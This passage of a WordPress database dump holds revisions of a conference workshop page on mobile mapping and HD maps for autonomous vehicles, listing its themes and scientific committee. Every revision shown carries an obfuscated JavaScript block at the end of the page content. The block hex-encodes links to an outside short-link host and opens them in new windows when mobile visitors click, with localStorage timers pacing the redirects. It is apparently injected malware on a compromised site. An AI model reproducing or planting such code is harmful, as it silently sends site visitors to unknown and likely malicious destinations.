_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 20:01:12','2022-10-07 20:01:12','',2095,'https://gsw2023.com/?p=2567',0,'revision','',0),
(2568,1,'2022-10-07 20:02:09','2022-10-07 20:02:09','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<strong><u style=\"text-align: left; color: green;\">Scientific Committee:</u></strong>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 20:02:09','2022-10-07 20:02:09','',2095,'https://gsw2023.com/?p=2568',0,'revision','',0),
(2569,1,'2022-10-07 20:05:37','2022-10-07 20:05:37','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Static HD maps automated production and update</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\n</li>\n<li>\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\n</li>\n<li>\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\n</li>\n<li>\n<h6><strong>HD maps applications</strong></h6>\n</li>\n<li>\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\n</li>\n<li>\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\n</li>\n<li>\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor calibration</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\n</li>\n<li>\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\n</li>\n<li>\n<h6><strong>Point cloud processing</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\n</li>\n<li>\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\n</li>\n<li>\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\n</li>\n<li>\n<h6><strong>Novel application cases</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<strong><u style=\"text-align: left; color: green;\">Scientific Committee:</u></strong></p>\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\n<ul>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\n</li>\n<li>\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>You Li, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\n</li>\n<li>\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 